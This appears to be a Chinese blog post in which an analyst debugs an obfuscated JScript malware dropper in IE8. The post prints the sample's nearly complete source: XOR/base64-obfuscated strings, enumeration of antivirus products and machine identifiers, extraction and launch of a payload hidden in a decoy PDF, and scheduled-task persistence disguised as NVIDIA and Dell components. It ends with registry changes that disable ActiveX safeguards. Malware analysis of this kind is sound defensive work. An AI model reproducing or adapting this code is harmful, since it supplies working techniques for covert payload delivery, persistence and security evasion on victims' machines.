Win7+ IE8
调试的HTML代码
<!DOCTYPE html><html><head><meta charset="utf-8"><title>建瓯最坏JavaScript脚本调试</title></head><body><script>document.write("<h1>🐷🐷🐷</h1>");var WScript = new ActiveXObject("WScript.Shell");//先尝试看看能不能成功调用“ActiveXObject”创建对象try{var objADODBStream = new ActiveXObject("ADODB.Stream");}catch(errADODB){document.write("尝试通过“ActiveXObject”创建流对象发生异常<br>");document.write("错误名称: " + errADODB.name + "<br>");document.write("错误信息: " + errADODB.message + "<br>");}function gVerFuncHandler(){document.write("gVerFuncHandler<br>");//"winmgmts:\\.\root\cimv2"var on = getStrFunc("L1krLAEkLEN/HTpnBEIqLhIVO1koN1RYMEVBZkk=");//var wmi = GetObject(on);//"SELECT Version FROM Win32_OperatingSystem"var qs = getStrFunc("KTAULgtmWiM9GTtbFRt4LRp9N1UPAiYBSCoXGy1AGwExBS9hAwYsDiV6dVhrSDI=");var items = wmi.ExecQuery(qs, "WQL", 0x30);var eit = new Enumerator(items);var wv = "";for (; !eit.atEnd(); eit.moveNext()){var it = eit.item();wv = it.Version;break;}if (!wv){return "";}//把字符串作为URI组件进行编码。该方法不会对ASCII的字母、数字和标点符号进行编码return encodeURIComponent(Func6E(wv));}function getRI_Func(min, max){document.write("getRI_Func<br>");return (Math.floor(Math.random() * (max + 1 - min)) + min);}function FuncXS(s){document.write("FuncXS<br>");var es = "";var k = getK_Handler();for (var i=0 ; i<s.length ; ++i){var sc = s.charCodeAt(i);var kc = k.charCodeAt(i % k.length);var xc = String.fromCharCode(sc ^ kc);es += xc;}return encodeURIComponent(Func6E(k+es));}function gSID_Handler(){document.write("gSID_Handler<br>");//"winmgmts:\\.\root\cimv2"var on = getStrFunc("L1krLAEkLEN/HTpnBEIqLhIVO1koN1RYMEVBZkk=");//var wmi = GetObject(on);//"SELECT UUID FROM Win32_ComputerSystemProduct"var qs = getStrFunc("CTInMHsteiI+PHxZHCUkOBguMxlYR2c6NRobAEwcKCQSBkwcNycZGlwMOQNad2t1OHk=");var items = wmi.ExecQuery(qs, "WQL", 0x30);var eit = new Enumerator(items);var sid = "";for (; !eit.atEnd(); eit.moveNext()){var it = eit.item();sid = it.UUID;break;}if (!sid){return "";}var i=0;var sidLen = sid.length;var sui = "";while ((i + 1) < sidLen){var s = (parseInt(sid.substring(i, i+2), 16) ^ 0x42).toString(16).toUpperCase();if (s.length < 2){s = "0" + s;}sui += s;i += 2;if (i == sidLen){break;}if (sid.charAt(i) == "-"){++i;sui += "-"}}return encodeURIComponent(Func6E(sui));}//Read,读取某文件function FuncRd(pt){document.write("FuncRd<br>");//读取参数(文件路径)以ISO-8859-1编码的流对象返回var ft = new ActiveXObject("ADODB.Stream");ft.Type = 2;ft.CharSet = "iso-8859-1";ft.Open();ft.LoadFromFile(pt);var ct = ft.ReadText(-1);ft.Close();ft = null;return ct;}function getStrFunc(bes){document.write("getStrFunc<br>");var es = Func6D(bes);var esl = es.length;var k = es.substring(esl-6);var s = es.substring(0, esl-6);var ds = "";for (var i=0 ; i<s.length ; ++i){var sc = s.charCodeAt(i);var kc = k.charCodeAt(i % k.length);//转成ASCII码后异或解密var xc = String.fromCharCode(sc ^ kc);ds += xc;}return ds;}//Base64Encodefunction Func6E(data){document.write("Func6E<br>");var os = new ActiveXObject("ADODB.Stream");os.Type = 2;os.CharSet = "us-ascii";os.Open();os.WriteText(data);os.Position = 0;os.type = 1;var output = os.Read;os.Close();var xmlObj = new ActiveXObject("MSXML.DOMDocument");var de = xmlObj.createElement("Base64Data");de.dataType = "bin.base64";de.nodeTypedValue = output;return de.text;}//文件存在判断和文件操作function InitFunc(){document.write("InitFunc<br>");try{if (var1.FolderExists(mwd)){var1.DeleteFolder(mwd, true);}}catch(errFolderExists){document.write("位置:FolderExists<br>");document.write("错误名称: " + errFolderExists.name + "<br>");document.write("错误信息: " + errFolderExists.message + "<br>");}try{pDirHandler(uwd);if (!var1.FolderExists(uwd)){var1.CreateFolder(uwd);}}catch(errpDirHandler){document.write("位置:DirHandler<br>");document.write("错误名称: " + errpDirHandler.name + "<br>");document.write("错误信息: " + errpDirHandler.message + "<br>");}try{var1.CreateFolder(mwd);}catch(errCreateFolder){document.write("位置:CreateFolder<br>");document.write("错误名称: " + errCreateFolder.name + "<br>");document.write("错误信息: " + errCreateFolder.message + "<br>");}var ic = false;while (!ic){try{var1.CopyFile(WScript.ScriptFullName, wtp);ic = true;}catch(errIC){document.write("位置:IC<br>");document.write("错误名称: " + errIC.name + "<br>");document.write("错误信息: " + errIC.message + "<br>");}}}function gvlFunc(){document.write("gvlFunc<br>");var as = "";try{"winmgmts:\\.\root\SecurityCenter"var on = getStrFunc("RFBfGQQIR0oLKD9Lb0teGxc5YFxSAREMR0ByEQ0RVkszOTF0Y2U=");//"AntiVirusProduct"var wif = getStrFunc("LVcFBR06HkwCPDk8CEwSGGw5cWxLUw==");var wmi = GetObject(on);var e = new Enumerator(wmi.InstancesOf(wif));for(; !e.atEnd(); e.moveNext()){var s = e.item();var n = s.displayName.toLowerCase();glas.push(n);as += n + "|";}on = getStrFunc("Tj9dBj00TSUJNwZ3ZSRcBC4FajNQHigwTS9wDjQtXCQBOVYza1pZ");wmi = GetObject(on);e = new Enumerator(wmi.InstancesOf(wif));for(; !e.atEnd(); e.moveNext()){var s = e.item();var n = s.displayName.toLowerCase();if (iTS(glas, n)){continue;}glas.push(n);as += n + "|";}as = as.substring(0, as.length-1);}catch(errgvlFunc){document.write("位置:gvlFunc<br>");document.write("错误名称: " + errgvlFunc.name + "<br>");document.write("错误信息: " + errgvlFunc.message + "<br>");}return as;}//写文件function FuncWrt(pt, ct){document.write("FuncWrt<br>");var ft = new ActiveXObject("ADODB.Stream");ft.Type = 2;ft.CharSet = "iso-8859-1";ft.Open();ft.WriteText(ct);ft.SaveToFile(pt, 2);ft.Close();ft = null;}//Time2String?返回时间字符串function tTOs(d){document.write("tTOs<br>");var day = d.getDate().toString();var year = d.getFullYear().toString();var month = (d.getMonth() + 1).toString();var hour = d.getHours().toString();var mins = d.getMinutes().toString();var secs = d.getSeconds().toString();if (day.length < 2){day = "0" + day;}if (month.length < 2){month = "0" + month;}if (hour.length < 2){hour = "0" + hour;}if (mins.length < 2){mins = "0" + mins;}if (secs.length < 2){secs = "0" + secs;}return (year + "-" + month + "-" + day + "T" + hour + ":" + mins + ":" + secs);}function TC2_Handler(uid, cd, iv){document.write("TC2_Handler<br>");/*if (glas.length > 0){*/var sd = new Date(cd.getTime()+(1000*60*6));var wd = uwd2;ep = tsp2;var ar = "\"" + uid + "\" -f -t";//"Recommended Troubleshooting Scan"var tn = getStrFunc("Zyk7XjcnUCI8VD5qYT43RDgmUD8wXjU+XCI/EQkpVCI1TFgxWko=");Sct_Handler(ar, ep, wd, sd, iv, tn);/*}*/}try{document.write("入口处<br>");var var1 = new ActiveXObject("Scripting.FileSystemObject");var var2 = new ActiveXObject("WScript.Shell");var tph = var2.ExpandEnvironmentStrings("%TMP%");var lp = tph + "\\" + getStrFunc("MyoAdRF6PyEEE3tnSlR6MS0xVgk6KnhlVEFJVw==");var en = getStrFunc("BgcGD3QUEwNrZm9hWnE=");var adp = var2.ExpandEnvironmentStrings("%localappdata%");var mep = getStrFunc("OQRRBDMLFiZeEx0iACxcFB02Nhp+AiQAFmVJOGdBZA==");var uwd = adp + mep;var mwd = uwd + getStrFunc("LmpEPXI4N05zNA==");var wtf = getStrFunc("QCZGGjhhdBJxA0MaUyRGN0UyVXQ0");var wtp = mwd + "\\" + wtf;var uwd2 = "%localappdata%\\" + getStrFunc("dj4tEAYrGCsLJj8FSgkQPSAEZCYSGiAOXTQ3ID0PWQUNOig4aGRUT2o=");var ep = uwd + "\\" + en;var tsp = "%localappdata%" + mep + "\\" + en;//"%localappdata%\NVIDIA Corporation\NvNode\Streaming"var ep2 = uwd + "\\" + getStrFunc("BCI/Hl40CCJwR0xqcFE=");//"%localappdata%\NVIDIA Corporation\NvNode\Streaming\nvsphelper32.exe"var tsp2 = uwd2 + "\\" + getStrFunc("Pz0rFz0wPTs9FWZnfy4gAlFLWGdVVQ==");var glas = [];var ut = 2;var zd = "9348556E";var fnd = getStrFunc("KyEPB3xkeHwsYxomIjRPRHkxNFI=");//直接到解密完下断再看局部变量的值//自身为“wctOLUCWCV7.dat”的逻辑/*if (WScript.ScriptFullName == wtp){WScript.Sleep(getRI_Func(30000, 40000));try{if (var1.FolderExists(mwd)){var1.DeleteFolder(mwd, true);}}catch(errScriptFullName){document.write("位置:ScriptFullName<br>");document.write("错误名称: " + errScriptFullName.name + "<br>");document.write("错误信息: " + errScriptFullName.message + "<br>");}WScript.Sleep(getRI_Func(30000, 40000));*/StartFunc();clFunc();/*}else{ //首次运行逻辑pswFunc(var2.CurrentDirectory);InitFunc();var1.DeleteFile(WScript.ScriptFullName);var a = getStrFunc("ChYaBloZHUVbWxwsUy8qF0EAGRFbaWV5dDNp");var s = a + " \"" + wtp + "\"";var2.Run(s, 0, 0);}*/}catch(errTRY){document.write("位置:TRY<br>");document.write("错误名称: " + errTRY.name + "<br>");document.write("错误信息: " + errTRY.message + "<br>");}//WScript.Quit();function getGlobalsEnv(){document.write("getGlobalsEnv<br>");//ComputerNamevar ud = var2.ExpandEnvironmentStrings(getStrFunc("azkeMSAuASEMPTxPTmxNdHJq"));//UserNamevar un = var2.ExpandEnvironmentStrings(getStrFunc("QS0RLQgkJTUHTWR4Qmhaag=="));//再通过“FuncXS”编码return FuncXS(ud + "\\" + un);}function Func_TC_GV(uid, cd, eav, ewv, edn){document.write("Func_TC_GV<br>");/*if (!testFunc1()){return;}*/var tsl = [["Slg6JwwiDkQlIAw6DhEJACgCI2gRIQEiIls3LQErLFs7KggtG2gRMQA+HGgBIQ4mO1s6KAYnGxowPAhvNFVEbU4=", "Rl8GJlQtAkMZIVQ1AhY1AXANL28tIFktLlwLLFkkIFwHK1AiF28tMFgxEGMzaUU1QQ==", "aRheHQkxTRN1CAoqVwNFBAMtahNfDjlqMW1sQw==", "ZwNzBTdXRU1zdw=="], ["RlVBJVZYF1UUCX9YBlgRHV1LGWh5LXYZK1FJdXddCkBeJ251DFNCCVxPAkRYIBxcG1FjNDFVMjk=", "FVZJJ10ZRFYcC3QZVVsZH1YKSmtxL31YeFJBd3wcWUNWJWU0X1BKMDc5Vzl4", "NBlRHzMzCx8ZPjIgFRteZ3o5eldG", "EzFRMENlZHh0eA=="]];for (var i=0 ; i<tsl.length ; ++i){//td是4个元素(加密字符串构成的)的数组var td = tsl[i];//"%localappdata%\DELL\DellMobileConnect\Dumps\TechToolkit.exe"var epp = getStrFunc(td[0]);//"%localappdata%\DELL\DellMobileConnect\Dumps"var wd = getStrFunc(td[1]);//"PropertyDefinitionSync"var tn = getStrFunc(td[2]);//"PT6H"var iv = getStrFunc(td[3]);var m = getRI_Func(1000*60*60*24, 1000*60*60*168);var sd = new Date(cd.getTime()+m);//""StringUID" "dev6H678UR.tmp" "NDI4OTE3dVxMUGdeRkdLaUNYUEdbTQ%3D%3D" "WindowsVersion" 0 "9348556E" "OTM5MzYxenx0Y2NlfGF3cnt0ZXJdXl9fUEBNQVdFVkE%3D" 2"var ar = "\"" + uid + "\" \"" + fnd + "\" \"" +eav + "\" \"" + ewv + "\" 0 \"" + zd + "\" \"" + edn + "\" " + ut.toString();Sct_Handler(ar, epp, wd, sd, iv, tn);//"%appdata%\Mael Horz\HxD Hex Editor\Logs\nvapiu.exe"+"%appdata%\Mael Horz\HxD Hex Editor\Logs"+"Schedule Defrag"+"PT5H"}}//Base64Decode,Base64解码function Func6D(data){document.write("Func6D<br>");//无法通过“WScript.CreateObject”创建对象//懒得找原因了,用“ActiveXObject”替代“WScript.CreateObject”//var xmlObj = WScript.CreateObject("MSXML.DOMDocument");var xmlObj = new ActiveXObject("MSXML.DOMDocument");var de = xmlObj.createElement("Base64Data");de.dataType = "bin.base64";de.text = data;//返回US-ASCII编码var os = new ActiveXObject("ADODB.Stream");os.Type = 1;os.Open();os.Write(de.nodeTypedValue);os.Position = 0;os.type = 2;os.CharSet = "us-ascii";var output = os.ReadText;os.Close();return output}function pDirHandler(p){document.write("pDirHandler<br>");var pf = var1.GetParentFolderName(p);try{if (var1.FolderExists(pf)) {return;}var1.CreateFolder(pf);}catch(errpDirHandler){document.write("位置:pDirHandler<br>");document.write("错误名称: " + errpDirHandler.name + "<br>");document.write("错误信息: " + errpDirHandler.message + "<br>");}}//计划任务function Sct_Handler(ar, ep, wd, sd, iv, tn){document.write("函数Sct_Handler:创建计划任务<br>");try{var ts = new ActiveXObject("Schedule.Service");ts.Connect();var rf = ts.GetFolder("\\");var tf = ts.NewTask(0);var ri = tf.RegistrationInfo;ri.Description = "";ri.Author = "";var tst = tf.Settings;tst.Enabled = true;tst.StartWhenAvailable = true;tst.Hidden = false;tst.DisallowStartIfOnBatteries = false;tst.StopIfGoingOnBatteries = false;tst.AllowHardTerminate = false;tst.ExecutionTimeLimit = "PT0S";var ids = tst.IdleSettings;ids.RestartOnIdle = false;ids.StopOnIdleEnd = false;var tt = tf.Triggers;var tr = tt.Create(1);tr.StartBoundary = tTOs(sd);tr.Enabled = true;tr.Repetition.Interval = iv;var ta = tf.Actions.Create(0);ta.Path = ep;ta.Arguments = ar;ta.WorkingDirectory = wd;//"RegisterTaskDefinition"rf[getStrFunc("KjMhLiUlHSQSJiU6PDMgLjg4DD8pKXhWRkdWUQ==")](tn, tf, 2, "","", 3);return true;}catch(errSct_Handler){document.write("位置:Sct_Handler<br>");document.write("错误名称: " + errSct_Handler.name + "<br>");document.write("错误信息: " + errSct_Handler.message + "<br>");}return false;}//Clear,删除指定文件function clFunc(){document.write("clFunc<br>");try{var sf = var1.GetFile(lp);sf.attributes = 128;var1.DeleteFile(lp);}catch(errclFunc){document.write("位置:clFunc<br>");document.write("错误名称: " + errclFunc.name + "<br>");document.write("错误信息: " + errclFunc.message + "<br>");}}function pswFunc(cd){document.write("pswFunc<br>");try{var fd = FuncRd(lp);cd = cd.toLowerCase();if(cd.substring(0, 4) == getStrFunc("DWlkRm5TODFxdA==") &&cd.substring(cd.length-3) == getStrFunc("AFx2bW9Eb1By")){var2.CurrentDirectory = tph;}var so = 3449;var ln = 30793;var eo = so+ln;var t = fd.slice(so, eo);var n = getStrFunc("LSM1cj9IISgxFFVVVF1PNgMDZmxhRmdl");FuncWrt(n, FXD_Func(t, true));WScript.Sleep(200);var2.Run("\"" + n + "\"", 1, 0);}catch(errpswFunc){document.write("位置:pswFunc<br>");document.write("错误名称: " + errpswFunc.name + "<br>");document.write("错误信息: " + errpswFunc.message + "<br>");}}function getK_Handler(){document.write("getK_Handler<br>");var s = "";var l = 6;var d = "123456789";for (var i=0 ; i<l ; ++i){s += d.charAt(Math.floor(d.length * Math.random()));}return s;}function FXD_Func(data, rep){document.write("FXD_Func<br>");var tb ={8364: 128,8218: 130,402: 131,8222: 132,8230: 133,8224: 134,8225: 135,710: 136,8240: 137,352: 138,8249: 139,338: 140,381: 142,8216: 145,8217: 146,8220: 147,8221: 148,8226: 149,8211: 150,8212: 151,732: 152,8482: 153,353: 154,8250: 155,339: 156,382: 158,376: 159};var l = data.charCodeAt(0);var k = data.slice(1, 1+l);var d = data.slice(1+l+4);var kb = [];for (var i=0 ; i<k.length ; ++i){var kc = k.charCodeAt(i);if (tb[kc]){kc = tb[kc];}kb.push(kc);}var nd = "";var ldc = 0;for (var i=0, j=0 ; i<d.length ; ++i, ++j){var kc = kb[j % kb.length];var dc = d.charCodeAt(i);if (tb[dc]){dc = tb[dc];}if (rep){if (ldc == 60 && dc == 0xff){if (i+3<d.length){var d1 = d.charCodeAt(i+1);var d2 = d.charCodeAt(i+2);var d3 = d.charCodeAt(i+3);if (d1 == dc && d2 == dc && d3 == dc){dc = 37;i += 3;}}}}nd += String.fromCharCode(dc ^ kc);ldc = dc;}return nd;}function StartFunc(){document.write("StartFunc<br>");try{//保证有lp(%TEMP%\KOT4X-GDPR2021.pdf)存在/*var fd = FuncRd(lp);var l = 522397;var eo = fd.length;var so = eo-l;var q = fd.slice(so, eo);FuncWrt(ep2, FXD_Func(q, false));var1.CopyFile(ep2, ep);var1.DeleteFile(ep2);*///var uid = gSID_Handler();var uid = "StringUID";var cd = new Date();var sd = new Date(cd.getTime()+(1000*60));var wd = uwd;var epp = tsp;//var eav = FuncXS(gvlFunc());var eav = FuncXS("AntiVirusProduct");//var ewv = gVerFuncHandler();var ewv = "WindowsVersion";var edn = getGlobalsEnv();var ar = "-p\"AXkUJk\" -sp\"\"\"" + uid + "\"\" \"\"" + fnd + "\"\" \"\"" + eav + "\"\" \"\"" + ewv + "\"\" 0 \"\"" + zd + "\"\" \"\"" + edn + "\"\" " + ut.toString() + "\"";var tn = getStrFunc("LSRRGiEBADBcFRUKASZaAykdBj9TBS8cAW9FMnFGcw==");var iv = "PT3H";Sct_Handler(ar, epp, wd, sd, iv, tn);Func_TC_GV(uid, cd, eav, ewv, edn);TC2_Handler(uid, cd, iv);}catch(errStartFunc){document.write("位置:StartFunc<br>");document.write("错误名称: " + errStartFunc.name + "<br>");document.write("错误信息: " + errStartFunc.message + "<br>");}}function testFunc1(){document.write("testFunc1<br>");try{/*if (glas.length == 0){return false}*///"avast"var s = getStrFunc("CDwZQx5pSngwalE=");//"avg"var g = getStrFunc("Ekc+czFZZWh4");for (var i=0 ; i<glas.length ; ++i){var a = glas[i];if (a.indexOf(s) != -1 || a.indexOf(g) != -1){return true}}}catch(errptestFunc1){document.write("位置:testFunc1<br>");document.write("错误名称: " + errptestFunc1.name + "<br>");document.write("错误信息: " + errptestFunc1.message + "<br>");}return false;}function iTS(arr, d){document.write("iTS<br>");for (var j=0 ; j<arr.length ; ++j){if (arr[j] == d){return true;}}return false;}document.write("<h1>鼓掌🥳<h1>");</script><p>👩💻脚本已结束👩💻</p></body></html>
错误
IE设置💔💔💔
已经按照百度到的很多要求设置IE的Internet选项都不行:
注册表💜💜💜
最后在注册表中设置Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}\Compatibility Flags的值为0,即可:
CLSID
还有其他的问题的话,通过catch错误码查看错误类型,或者找到对应代码查看其错误的对象类型,修改注册表中对应CLSID的值。
CLSID
成功💫💫💫
允许阻止的内容
安全警告-是
允许ActiveX交互
F12进行调试
停止运行脚本
脚本窗口
F5:开始调试
F9:下断点
F10:逐过程调试
F11:逐语句调试
没运行起来看看是不是IE窗口(上面是调试窗口),有允许ActiveX交互弹框没确认,没有弹框就按一下F5:
调试状态
若有收获,就点个赞吧
0 人点赞
